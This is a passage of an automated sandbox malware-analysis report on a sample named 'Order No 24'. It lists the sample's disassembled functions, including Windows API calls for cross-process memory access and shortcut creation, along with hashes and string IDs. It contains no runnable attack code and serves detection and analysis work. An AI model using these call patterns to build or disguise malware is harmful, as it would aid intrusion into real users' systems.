                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009BAAAF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                  • Opcode ID: b9238eeb1facb986b294c1dd53d8656fe6a3ffc5e9a3b67ecf8e32fa0f0ef882
                                                                                                                                  • Instruction ID: e04f832c80cf6c570a17e871c676206b97bafea3b2b0b00c843a27a44d279736
                                                                                                                                  • Opcode Fuzzy Hash: b9238eeb1facb986b294c1dd53d8656fe6a3ffc5e9a3b67ecf8e32fa0f0ef882
                                                                                                                                  • Instruction Fuzzy Hash: C3F04F762002086FEB119FE4AD89EAB3BADFF49765F400519FA45C7190DB609C43CA71
                                                                                                                                  Function 009BEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 009BEC94
                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 009BECAB
                                                                                                                                  • MessageBeep.USER32(00000000), ref: 009BECC3
                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 009BECDF
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 009BECF9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                  • Opcode ID: ed967a6b71164c77a69fbfbf4e617ca22ea6fec60fc1478925e367f3bbecbd5b
                                                                                                                                  • Instruction ID: a435b3ded0ff436e806811ded0d6538ddddf1a69b7de93167d13ff3d428be6d0
                                                                                                                                  • Opcode Fuzzy Hash: ed967a6b71164c77a69fbfbf4e617ca22ea6fec60fc1478925e367f3bbecbd5b
                                                                                                                                  • Instruction Fuzzy Hash: 47018131500708ABEB249B90DF4EBD67BBCFB00715F000959B582A14E0DBF4AA9ACB80
                                                                                                                                  Function 0099B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EndPath.GDI32(?), ref: 0099B0BA
                                                                                                                                  • StrokeAndFillPath.GDI32(?,?,009FE680,00000000,?,?,?), ref: 0099B0D6
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0099B0E9
                                                                                                                                  • DeleteObject.GDI32 ref: 0099B0FC
                                                                                                                                  • StrokePath.GDI32(?), ref: 0099B117
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2625713937-0
                                                                                                                                  • Opcode ID: 662ea77bebad4581f4f476c19933acf66537edf3ac46ae9da6472a81be8c3765
                                                                                                                                  • Instruction ID: 20bc604fb8896cd1951e05d913ad87d00d1ea34910ca3963c8ba4373df030874
                                                                                                                                  • Opcode Fuzzy Hash: 662ea77bebad4581f4f476c19933acf66537edf3ac46ae9da6472a81be8c3765
                                                                                                                                  • Instruction Fuzzy Hash: E6F0F639004208AFCB21DFE9ED08B647F64A742366F088314F429440F0C7368997CF50
                                                                                                                                  Function 009CF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 009CF2DA
                                                                                                                                  • CoCreateInstance.OLE32(00A0DA7C,00000000,00000001,00A0D8EC,?), ref: 009CF2F2
                                                                                                                                  • CoUninitialize.OLE32 ref: 009CF555
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                  • String ID: .lnk
                                                                                                                                  • API String ID: 948891078-24824748
                                                                                                                                  • Opcode ID: 875c057d3ea5e58aa87fc4c0f7f6ed50183bbccb4da61f2593aca7601d7d1d60
                                                                                                                                  • Instruction ID: 44550724a8a282995f0b44f0b7223810053059eab5fce45703cc1484c62bd54f
                                                                                                                                  • Opcode Fuzzy Hash: 875c057d3ea5e58aa87fc4c0f7f6ed50183bbccb4da61f2593aca7601d7d1d60
                                                                                                                                  • Instruction Fuzzy Hash: E1A10BB2504201AFD700EFA4C891EABB7ECEFD8714F00495DF55597292EB70EA49CB62
                                                                                                                                  Function 009CE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0098660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009853B1,?,?,009861FF,?,00000000,00000001,00000000), ref: 0098662F
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 009CE85D
                                                                                                                                  • CoCreateInstance.OLE32(00A0DA7C,00000000,00000001,00A0D8EC,?), ref: 009CE876
                                                                                                                                  • CoUninitialize.OLE32 ref: 009CE893
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                  • String ID: .lnk
                                                                                                                                  • API String ID: 2126378814-24824748
                                                                                                                                  • Opcode ID: 96ce3bdecf7648d637f0c956cb7547a321078b40d305bfb2673d4e03acb3905a
                                                                                                                                  • Instruction ID: 33dc0cc82f3d81d2c9d4f53102552eba920ce5463262180773fa89d5a3a60053
                                                                                                                                  • Opcode Fuzzy Hash: 96ce3bdecf7648d637f0c956cb7547a321078b40d305bfb2673d4e03acb3905a
                                                                                                                                  • Instruction Fuzzy Hash: 95A13775A043019FCB14EF14C884E2ABBE9BF89710F14895DF9969B3A1CB31ED45CB92
                                                                                                                                  Function 009A325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 009A32ED
                                                                                                                                    • Part of subcall function 009AE0D0: __87except.LIBCMT ref: 009AE10B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorHandling__87except__start
                                                                                                                                  • String ID: pow
                                                                                                                                  • API String ID: 2905807303-2276729525
                                                                                                                                  • Opcode ID: 66e4a235922aa1a1c641071afedbb93b73b37ea06c8c12d138b293c63aa0af87
                                                                                                                                  • Instruction ID: 8b7b720a297336b87b1cf52b9a3dba03b9e344df076b7d817024fd970d2d2ba6
                                                                                                                                  • Opcode Fuzzy Hash: 66e4a235922aa1a1c641071afedbb93b73b37ea06c8c12d138b293c63aa0af87
                                                                                                                                  • Instruction Fuzzy Hash: 2F514B31A0C20296CF15B758C94137A3B9CDB83750F60CD68F8E5822A9DF388D959BC6
                                                                                                                                  Function 009C4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00A1DC50,?,0000000F,0000000C,00000016,00A1DC50,?), ref: 009C4645
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009C46C5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper$__itow__swprintf
                                                                                                                                  • String ID: REMOVE$THIS
                                                                                                                                  • API String ID: 3797816924-776492005
                                                                                                                                  • Opcode ID: 5298a98622a6013ada46f289278952fe3c3faa08c8d3a0f68ad0aac8e815ef03
                                                                                                                                  • Instruction ID: bd74997649c60f59627754e133547cc357aad71553b759e142d449eb526c8c77
                                                                                                                                  • Opcode Fuzzy Hash: 5298a98622a6013ada46f289278952fe3c3faa08c8d3a0f68ad0aac8e815ef03
                                                                                                                                  • Instruction Fuzzy Hash: CB417C75A002099FCF05EFA4C891FAEB7B8BF89304F148459E916AB392DB34DD41CB51
                                                                                                                                  Function 009BC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009BBC08,?,?,00000034,00000800,?,00000034), ref: 009C4335
                                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009BC1D3
                                                                                                                                    • Part of subcall function 009C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 009C4300
                                                                                                                                    • Part of subcall function 009C422F: GetWindowThreadProcessId.USER32(?,?), ref: 009C425A
                                                                                                                                    • Part of subcall function 009C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 009C426A
                                                                                                                                    • Part of subcall function 009C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 009C4280
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009BC240
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009BC28D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                                  • Opcode ID: 77ff236956d2b3a3aeaa5ca72bbf7ff6d874c61112b4e99f4e23fc3823a63129
                                                                                                                                  • Instruction ID: f58b0cd348ca3d6b0e4f74993307de0878b128c10d87af5a307da5c48124e071
                                                                                                                                  • Opcode Fuzzy Hash: 77ff236956d2b3a3aeaa5ca72bbf7ff6d874c61112b4e99f4e23fc3823a63129
                                                                                                                                  • Instruction Fuzzy Hash: 25412C72A0021CAFDB11DFA4CD92FEEB7B8AF49710F004099FA55B7181DA71AE45CB61
                                                                                                                                  Function 009EA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A1DC00,00000000,?,?,?,?), ref: 009EA6D8
                                                                                                                                  • GetWindowLongW.USER32 ref: 009EA6F5
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009EA705
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long
                                                                                                                                  • String ID: SysTreeView32
                                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                                  • Opcode ID: dbf99d262fb182d75e7012c3c54e2d338c9c578c64401c149cc107c8b9d2e154
                                                                                                                                  • Instruction ID: a8eb4fd4b96c27daedc21044b129a4429f638aae04b5427c67adb199c72a6491
                                                                                                                                  • Opcode Fuzzy Hash: dbf99d262fb182d75e7012c3c54e2d338c9c578c64401c149cc107c8b9d2e154
                                                                                                                                  • Instruction Fuzzy Hash: 1131AD36600249AFDB228E79CC41BEA7BA9FB89334F244715F975922E0D735EC518B90
                                                                                                                                  Function 009EA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009EA15E
                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009EA172
                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 009EA196
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                  • String ID: SysMonthCal32
                                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                                  • Opcode ID: 138aa164aafc780afe0f1355fadc6476e6eb0ab096e1ab8a754b74d992f29124
                                                                                                                                  • Instruction ID: 4d924590552698cd5971714c589affb3c81e96c0782e8f7f0fdb5c0ebab2bda9
                                                                                                                                  • Opcode Fuzzy Hash: 138aa164aafc780afe0f1355fadc6476e6eb0ab096e1ab8a754b74d992f29124
                                                                                                                                  • Instruction Fuzzy Hash: 2C217F32510218ABDF168F94CC82FEA3B7AEF88754F110214FA556B1E0D6B5BC55CB91
                                                                                                                                  Function 009EA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 009EA941
                                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 009EA94F
                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009EA956
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                                  • String ID: msctls_updown32
                                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                                  • Opcode ID: 1e5596bac8fafb8cca31cf0dddc2370a00aa2a4f9f3ea26659840ef79a7380bc
                                                                                                                                  • Instruction ID: bddeb1a4e4b42c1b106e4bc5ad7115b386d21649f8ece297de0a5dd57b1f6acf
                                                                                                                                  • Opcode Fuzzy Hash: 1e5596bac8fafb8cca31cf0dddc2370a00aa2a4f9f3ea26659840ef79a7380bc
                                                                                                                                  • Instruction Fuzzy Hash: BB21B0B5200209AFDB11DF69CC81D7777ADEB8A3A4B050059FA049B3A2CB31FC128B61
                                                                                                                                  Function 009E99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009E9A30
                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009E9A40
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009E9A65
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                  • String ID: Listbox
                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                  • Opcode ID: 4ad6d323f9fcc976451f9fc877e10887aac1a937e5a15eaac58283868ee55e1a
                                                                                                                                  • Instruction ID: ba89e842a0965f757f3a3daefd92fa3903235158875f7f85f1eaaf0dcc76fa12
                                                                                                                                  • Opcode Fuzzy Hash: 4ad6d323f9fcc976451f9fc877e10887aac1a937e5a15eaac58283868ee55e1a
                                                                                                                                  • Instruction Fuzzy Hash: 6F21D432610158BFDF228F55CC85FBB3BAEEF89750F018129F9549B1A0C6719C52C7A0
                                                                                                                                  Function 009EA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009EA46D
                                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009EA482
                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009EA48F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                  • Opcode ID: fb94299566efefffaed64135c0eaaea9750883adc3e1776b6e20aa377b50f363
                                                                                                                                  • Instruction ID: 6c1576a732de324e2278dbfce66844469d26edd88f7f19df595c36f13d6ae18c
                                                                                                                                  • Opcode Fuzzy Hash: fb94299566efefffaed64135c0eaaea9750883adc3e1776b6e20aa377b50f363
                                                                                                                                  • Instruction Fuzzy Hash: 6F11C471200248BAEF259F66CC45FAB776DEF89754F014118FA45960F1E2B2E811C720
                                                                                                                                  Function 009A2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,009A2350,?), ref: 009A22A1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 009A22A8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
